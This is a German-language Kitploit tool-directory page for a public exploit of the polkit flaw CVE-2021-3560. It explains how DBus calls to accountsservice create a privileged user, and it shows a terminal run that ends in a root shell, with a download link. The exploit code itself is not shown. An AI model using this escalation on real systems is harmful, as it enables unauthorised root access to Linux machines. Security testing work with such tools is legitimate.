Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Polkit-exploit — Privilegienerweiterung mit polkit - CVE-2021-3560 | Kitploit
Tools/GitHubGitHub/almorabea/polkit-exploit
Privilege EscalationSchwachstellenanalyseExploitationPost-ExploitationPenetrationstestsRed Teaming
GitHubalmorabea/polkit-exploit

Polkit-exploit

Privilegienerweiterung mit polkit - CVE-2021-3560

Repository anzeigen
12652vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Polkit-exploit - CVE-2021-3560

Privilegieneskalation mit polkit - CVE-2021-3560

Zusammenfassung

CVE-2021-3560 ist eine Authentifizierungsumgehung auf polkit, die es nicht privilegierten Benutzern ermöglicht, privilegierte Methoden über DBus aufzurufen. In diesem Exploit rufen wir zwei von accountsservice bereitgestellte privilegierte Methoden (CreateUser und SetPassword) auf, die es uns erlauben, einen privilegierten Benutzer zu erstellen, ein Passwort zu setzen, uns als erstellter Benutzer anzumelden und schließlich zu Root zu erweitern.

Autor des Exploit-Codes

Ahmad Almorabea @almorabea http://almorabea.net

Verwendung

root@kitploit:~
test@ubuntu:~/Desktop$ python3 CVE-2021-3560.py 
**************
Exploit: Privilege escalation with polkit - CVE-2021-3560
Exploit code written by Ahmad Almorabea @almorabea
Original Exploit Author: Kevin Backhouse 
For more details check this: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/#history
[+]Starting the Exploit 
[+] User Created with the name of ahmed
[+] Timed out at: 0.008446890996407191
[+] Timed out at: 0.008934336684707084
[+] Exploit Completed, your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root 
bash: cannot set terminal process group (46983): Inappropriate ioctl for device
bash: no job control in this shell
root@ubuntu:/home/test/Desktop# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/test/Desktop# whoami
root
root@ubuntu:/home/test/Desktop#

Demonstration

GUI-Authentifizierung


Terminal-Authentifizierung


Danksagung

Kevin Backhouse (https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/)

Tool herunterladen